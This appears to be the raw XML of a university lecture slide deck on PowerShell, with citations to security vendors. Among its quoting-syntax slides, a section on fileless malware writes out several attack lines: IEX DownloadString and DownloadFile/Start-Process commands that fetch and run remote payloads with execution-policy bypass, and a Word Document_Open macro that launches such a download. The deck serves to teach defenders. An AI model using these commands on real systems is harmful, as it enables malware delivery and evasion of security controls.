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4"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="299" r:id="rId3"/>
    <p:sldId id="423" r:id="rId4"/>
    <p:sldId id="424" r:id="rId5"/>
    <p:sldId id="389" r:id="rId6"/>
    <p:sldId id="411" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="277" r:id="rId9"/>
    <p:sldId id="351" r:id="rId10"/>
    <p:sldId id="352" r:id="rId11"/>
    <p:sldId id="353" r:id="rId12"/>
    <p:sldId id="354" r:id="rId13"/>
    <p:sldId id="356" r:id="rId14"/>
    <p:sldId id="357" r:id="rId15"/>
    <p:sldId id="410" r:id="rId16"/>
    <p:sldId id="358" r:id="rId17"/>
    <p:sldId id="359" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="276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344" r:id="rId29"/>
    <p:sldId id="345" r:id="rId30"/>
    <p:sldId id="346" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="303" r:id="rId33"/>
    <p:sldId id="329" r:id="rId34"/>
    <p:sldId id="330" r:id="rId35"/>
    <p:sldId id="331" r:id="rId36"/>
    <p:sldId id="332" r:id="rId37"/>
    <p:sldId id="333" r:id="rId38"/>
    <p:sldId id="343" r:id="rId39"/>
    <p:sldId id="334" r:id="rId40"/>
    <p:sldId id="335" r:id="rId41"/>
    <p:sldId id="347" r:id="rId42"/>
    <p:sldId id="336" r:id="rId43"/>
    <p:sldId id="337" r:id="rId44"/>
    <p:sldId id="342" r:id="rId45"/>
    <p:sldId id="349" r:id="rId46"/>
    <p:sldId id="338" r:id="rId47"/>
    <p:sldId id="339" r:id="rId48"/>
    <p:sldId id="348" r:id="rId49"/>
    <p:sldId id="340" r:id="rId50"/>
    <p:sldId id="341" r:id="rId51"/>
    <p:sldId id="304" r:id="rId52"/>
    <p:sldId id="300" r:id="rId53"/>
    <p:sldId id="316" r:id="rId54"/>
    <p:sldId id="319" r:id="rId55"/>
    <p:sldId id="317" r:id="rId56"/>
    <p:sldId id="320" r:id="rId57"/>
    <p:sldId id="321" r:id="rId58"/>
    <p:sldId id="285" r:id="rId59"/>
    <p:sldId id="289" r:id="rId60"/>
    <p:sldId id="290" r:id="rId61"/>
    <p:sldId id="291" r:id="rId62"/>
    <p:sldId id="293" r:id="rId63"/>
    <p:sldId id="261" r:id="rId64"/>
    <p:sldId id="262" r:id="rId65"/>
    <p:sldId id="263" r:id="rId66"/>
    <p:sldId id="257" r:id="rId67"/>
    <p:sldId id="258" r:id="rId68"/>
    <p:sldId id="360" r:id="rId69"/>
    <p:sldId id="372" r:id="rId70"/>
    <p:sldId id="376" r:id="rId71"/>
    <p:sldId id="377" r:id="rId72"/>
    <p:sldId id="374" r:id="rId73"/>
    <p:sldId id="373" r:id="rId74"/>
    <p:sldId id="378" r:id="rId75"/>
    <p:sldId id="379" r:id="rId76"/>
    <p:sldId id="391" r:id="rId77"/>
    <p:sldId id="393" r:id="rId78"/>
    <p:sldId id="392" r:id="rId79"/>
    <p:sldId id="375" r:id="rId80"/>
    <p:sldId id="380" r:id="rId81"/>
    <p:sldId id="386" r:id="rId82"/>
    <p:sldId id="382" r:id="rId83"/>
    <p:sldId id="383" r:id="rId84"/>
    <p:sldId id="384" r:id="rId85"/>
    <p:sldId id="370" r:id="rId86"/>
    <p:sldId id="361" r:id="rId87"/>
    <p:sldId id="363" r:id="rId88"/>
    <p:sldId id="364" r:id="rId89"/>
    <p:sldId id="365" r:id="rId90"/>
    <p:sldId id="401" r:id="rId91"/>
    <p:sldId id="366" r:id="rId92"/>
    <p:sldId id="367" r:id="rId93"/>
    <p:sldId id="368" r:id="rId94"/>
    <p:sldId id="394" r:id="rId95"/>
    <p:sldId id="395" r:id="rId96"/>
    <p:sldId id="396" r:id="rId97"/>
    <p:sldId id="397" r:id="rId98"/>
    <p:sldId id="398" r:id="rId99"/>
    <p:sldId id="399" r:id="rId100"/>
    <p:sldId id="400" r:id="rId101"/>
    <p:sldId id="402" r:id="rId102"/>
    <p:sldId id="403" r:id="rId103"/>
    <p:sldId id="404" r:id="rId104"/>
    <p:sldId id="405" r:id="rId105"/>
    <p:sldId id="406" r:id="rId106"/>
    <p:sldId id="408" r:id="rId107"/>
    <p:sldId id="409" r:id="rId108"/>
    <p:sldId id="412" r:id="rId109"/>
    <p:sldId id="413" r:id="rId110"/>
    <p:sldId id="421" r:id="rId111"/>
    <p:sldId id="422" r:id="rId112"/>
    <p:sldId id="414" r:id="rId113"/>
    <p:sldId id="415" r:id="rId114"/>
    <p:sldId id="416" r:id="rId115"/>
    <p:sldId id="417" r:id="rId116"/>
    <p:sldId id="418" r:id="rId117"/>
    <p:sldId id="419" r:id="rId118"/>
    <p:sldId id="312" r:id="rId119"/>
    <p:sldId id="318" r:id="rId120"/>
    <p:sldId id="369" r:id="rId121"/>
    <p:sldId id="315" r:id="rId122"/>
    <p:sldId id="350" r:id="rId1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764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118" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-123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5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0C182-D1A5-4ADC-85B4-DE5CFC5C81B6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82F17-CDA8-416A-84A3-F2E2D4A73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67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D9E2-AD98-45CE-8B26-618709AA10B7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1FF2-0EEB-4BA6-AC58-82D954992776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D62CA-87A3-425E-A7AC-6EFF3C6ACA1C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C27-4191-4EE8-BDD3-463ADED69816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F780-5749-4985-B5DF-F1C0D1A661B1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6A86-AE0A-453A-B1BD-BFD7D6F363CC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94F4-201E-44CA-8291-E40051AE3000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4D6-8B19-485E-BBFD-3CADFD886F72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4331-5A48-4E24-80D1-070BAC273980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D1FD-5B2A-4D59-96B6-8441AFA6E510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835-9F72-4219-99D9-61D1A6DC67C9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FC6263-B3E2-4B48-804E-175C3EC04E07}" type="datetime1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F8C78C-8FDE-4FCF-9D21-7AA0D5AA82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syntax-esc.html#quotes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cafee.com/enterprise/en-us/assets/solution-briefs/sb-fileless-malware-execution.pdf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cafee.com/enterprise/en-us/assets/solution-briefs/sb-fileless-malware-execution.pdf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cafee.com/enterprise/en-us/assets/solution-briefs/sb-fileless-malware-execution.pdf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cafee.com/enterprise/en-us/assets/solution-briefs/sb-fileless-malware-execution.pdf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aritech.com/blog/information-security/fileless-malware-attacks/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egrepper.com/code-examples/javascript/execute+powershell+command+from+javascript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egrepper.com/code-examples/javascript/execute+powershell+command+from+javascript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net.com/attack-techniques-hands-on/powershell-obfuscation-demystified-series-chapter-1-intro/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerperformance.co.uk/powershell/environmental-variables/" TargetMode="Externa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beronesecurity.com/blog/abusing-mshta-exe-to-gain-powershell-access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s64.com/ps/syntax-compare.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ss64.com/ps/syntax-wildcard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s64.com/ps/syntax-esc.html#quotes" TargetMode="Externa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powershell_exe?view=powershell-5.1" TargetMode="Externa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ss64.com/ps/call.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ss64.com/ps/syntax-operator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syntax-esc.html#quot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syntax-esc.html#quot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syntax-esc.html#quot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syntax-esc.html#quot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tencent.com/developer/article/1799004" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.spiceworks.com/tech/devops/articles/what-is-powershell/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/system/2656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s64.com/ps/syntax.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/edward-hong-%E6%8A%80%E8%A1%93%E7%AD%86%E8%A8%98/powershell-%E5%A6%82%E4%BD%95%E6%92%B0%E5%AF%AB%E4%BB%A5%E5%8F%8A%E5%9F%B7%E8%A1%8C-powershell-script-51b6fc7cf099" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pingmaoer.github.io/2020/03/13/PowerShell%E5%9F%BA%E7%A1%80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eguide.cc/powershell-beginner-introduction/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opensourcedoc.com/windows-programming/powershel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eguide.cc/powershell-beginner-introduction/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/scripting/samples/removing-objects-from-the-pipeline--where-object-?view=powershell-7.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sourcedoc.com/windows-programming/powershell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sourcedoc.com/windows-programming/powershel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yperpolyglot.org/shell" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.spiceworks.com/tech/devops/articles/what-is-powershel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sourcedoc.com/windows-programming/powershell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55775202/what-is-w-1-and-c-in-powershell-command" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_parameters?view=powershell-7.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powershell_exe?view=powershell-5.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powershell_exe?view=powershell-5.1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script_blocks?view=powershell-7.1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zh-tw/powershell/module/microsoft.powershell.core/about/about_operators?view=powershell-7.1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call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cal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senergy.com/zh-tw/windowspowershellhelp/html/69555d95-b481-43e1-86e7-b46d68b3e2dd.ht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call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core/about/about_powershell_exe?view=powershell-5.1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powershell/module/microsoft.powershell.utility/get-host?view=powershell-7.1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1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eguide.cc/powershell-beginner-introduction/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/zh-tw/powershell/module/microsoft.powershell.core/about/about_redirection?view=powershell-7.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net.com/attack-techniques-hands-on/powershell-obfuscation-demystified-series-chapter-1-intro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zh-tw/powershell/module/microsoft.powershell.core/about/about_operators?view=powershell-7.1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ss64.com/ps/syntax-operators.html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zh-tw/powershell/module/microsoft.powershell.core/about/about_operators?view=powershell-7.1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utility/?view=powershell-7.1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s://whatis.techtarget.com/definition/cmdlet" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/scripting/powershell-commands?view=powershell-7.1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scripting/powershell-commands?view=powershell-7.1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windowsserver.techtarget.com/tutorial/Start-scripting-with-this-PowerShell-tutorial-for-beginners" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://searchwindowsserver.techtarget.com/Comprehensive-PowerShell-guide-for-new-and-seasoned-admi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hatis.techtarget.com/definition/cmdlet" TargetMode="Externa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whatis.techtarget.com/definition/cmdlet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owershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2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guide.cc/powershell-beginner-introduction/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tencent.com/developer/article/1802245" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forums.hak5.org/topic/41729-running-powershell-in-memory/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ums.hak5.org/topic/41729-running-powershell-in-memory/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ss64.com/ps/invoke-expression.html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ss64.com/ps/common.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xkcd.com/32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s64.com/ps/get-alias.html" TargetMode="Externa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whats-wha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protoday.com/business-continuity/how-use-powershell-discover-iscsi-target-information" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershel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protoday.com/vulnerabilities-and-threats/fileless-malware-attacks-and-powershell-how-they-work" TargetMode="Externa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protoday.com/vulnerabilities-and-threats/fileless-malware-attacks-and-powershell-how-they-work" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.itprotoday.com/data-security-and-encryption/how-run-attack-simulations-against-microsoft-365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today.com/vulnerabilities-and-threats/fileless-malware-attacks-and-powershell-how-they-wor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Powershell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3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7" y="2675467"/>
            <a:ext cx="8424936" cy="3450696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Either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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quotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>may be used to specify a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literal string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When you enclose a string in single quotation marks, any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names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in the string such as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altLang="zh-TW" dirty="0"/>
              <a:t>will appear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>exactly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>as typed when the command is processed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>in single-quoted strings are not evaluated, not even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escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the string contains any embedded single quotes, they must be doubled (replace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dirty="0"/>
              <a:t> with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Single-Quoted Strings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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SS64.com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8225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7" y="2675467"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The third command in the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dirty="0"/>
              <a:t> is the one that actually executes the malicious file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command instructs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to open a Command Prompt window and launch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C:\Files\Explorer.exe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Explanation of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Third </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command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49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708920"/>
            <a:ext cx="8928992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An attacker can perform remote execution of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>script by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>directly executing it in memory to bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>endpoint security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Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is a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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>line example that uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to download content from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>a remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>location to a buffer in memory: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-ep Bypass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zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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((New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ObjectNet.WebClient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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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DownloadString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(‘https://[website]/malware.ps1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’))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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Loading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Scripts Directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Memory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 smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Macfee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872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The purpose of the “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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” parameter is to bypass</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>execution policies so that administrators can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>remotely execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>commands. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, attackers can also use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>parameter to bypass security. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>this parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>doesn’t result in any configuration change, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>it’s a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>common target to bypass security.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Explanation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Macfee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]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75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Administrators can lock down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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>other interpreters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>based on an extension. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>may have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>blocked execution of an extension such as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.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>attacker can bypass it by using anther extension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For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example,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’s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Get-Content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> can access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>of a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.ps2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware script and pass it to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dirty="0"/>
              <a:t>) for execution.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Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Scripts without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Default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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Interpreter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Macfee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r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11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64095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18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–ep Bypass “&amp; {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Get-Content .\malware.ps2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Macfee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8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Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>explained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Stephen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Cooper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25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4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640959" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>“execute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command from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altLang="zh-TW" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Code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 smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>codegrepper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000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2675467"/>
            <a:ext cx="8568952" cy="3450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spawn = require("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child_process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spawn,child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 = spawn("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",["c:\\temp\\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helloworld.ps1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"]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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child.stdout.on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data",function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console.log("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Data: " + data);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buNone/>
            </a:pP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child.stderr.on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data",function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console.log("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Errors: " + data);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buNone/>
            </a:pP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child.on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exit",function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console.log("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Script finished");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buNone/>
            </a:pP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child.stdin.end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//end input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4480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altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execute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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Script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codegrepper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-250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776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640960" cy="345069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Let’s look at some basic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building blocks that are often found in malicious scripts samples. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>script opens an external connection in order to download and execute a malicious binary file from a specific URL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(New-Object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System.Net.WebClient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).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DownloadFile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(’http://www.demo.local/cybad.exe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’,”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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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env:APPDATA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\cybad.exe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 ; Start-Process (“$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env:APPDATA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\cybad.exe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endParaRPr lang="en-US" altLang="zh-TW" sz="16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-command  {(New-Object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System.Net.WebClient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DownloadFile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('https://staff.csie.ncu.edu.tw/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hsufh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/COURSES/SPRING2022/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calc.exe','C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:\Users\Fu-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Hau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H\Desktop\test1.exe') ; Start-Process ('C:\Users\Fu-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Hau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H\Desktop\test1.exe')}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600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sz="1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Simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>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Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1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>
                <a:hlinkClick r:id="rId3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58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640959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– exec bypass – C “IEX(New-Object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Net.WebClient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DownloadString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(’http://www.demo.local/cybad.ps1’)”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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is not saved on the disk but is rather loaded directly to memory by the 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dirty="0"/>
              <a:t> cmdlet (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/>
              <a:t>).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bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> parameter instructs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command to ignore (bypass) the execution policies in order to allow the command to be executed remotely. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>default,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is configured to prevent the execution of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scripts on Windows system.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109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Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ttack Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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>
                <a:hlinkClick r:id="rId2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18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64095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$5000'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$5000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$5000'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$5000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="Hello"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test'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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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58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885698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Sub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Document_Open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altLang="zh-TW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Shell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(“C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:\Windows\System32\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WindowsPowerShell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\v1.0\powershell.exe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-command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW" sz="16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DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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(‘https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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altLang="zh-TW" sz="16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staff.csie.ncu.edu.tw/</a:t>
            </a:r>
